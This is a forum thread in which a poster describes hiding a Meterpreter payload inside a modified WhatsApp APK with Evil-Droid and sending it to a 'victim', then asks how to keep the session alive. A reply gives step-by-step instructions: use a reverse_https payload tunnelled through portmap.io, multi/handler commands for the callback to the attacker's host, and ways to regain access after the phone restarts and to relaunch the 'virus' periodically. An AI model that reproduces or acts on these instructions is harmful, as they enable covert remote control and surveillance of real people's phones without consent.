Forum Thread: Merged Meterpreter in Apk Android Session Lost

hi - am a web developer not a Android Pentester so i have question or maybe problem

  • Create Meterpreter with Msfvenom and port 4444 and i receive the connection without any problem
  • so i have idea to inject it inside whatsapp gold edition (another whatsapp)
  • so i used Evil-Droid and i success with that , first time you install the apk i receive the connectio
  • after 30 minute or less i lost the connection When My Conn

ection is good And The victim still using application First Problem

  • in this 30 minute if the victim close the whatsapp the connection is lost until open it again

so any solution ? the save the connection between us or to run it in his background ?

2 Responses

troubleshoot Guys ?

hi

first of all, reverse_https is the best payload. it's less detectable, secure, and you can use a DNS address with it, for example noip or portmap. with reverse_tcp, you can use only an IP address... if your IP changes, you lose your victim forever.

So, my advice to you is this:

Step 1: Create a Portmap Account

Go to portmap.io, create an account, log in and create a new rule/ config. choose the port that you want to forward. I like port 443. Now, download the config file to your computer (I use Kali).

Step 2: Create the Payload

Create a payload using Evil-Droid...set the LHOST=your-portmap-address54376.io and LPORT=54376 (check your portmap account for the correct details). Send the file to your victim.

Step 3: Receive the Connection

Now, open a multi/handler session
set LHOST your-portmap-address54376.io
set LPORT 443 (the port you redirect to on your machine)
set exitonsession false
exploit -j
Finally, open a terminal and type:
openvpn --config your-portmap-config.ovpn (the config file that you downloaded)
Hit Enter.

NB:

What happens exactly? the victim connects to portmap.io, and portmap redirects the meterpreter session to you. So, you don't need to open ports on your router, and that's cool. Your PORTMAP account is for life, doesn't expire.

You don't lose victims, and whenever your victim restarts the phone, you get a meterpreter as long as he keeps the app installed. You can upload a bash script to start the virus periodically. Search for the script online.

Share Your Thoughts

  • Hot
  • Active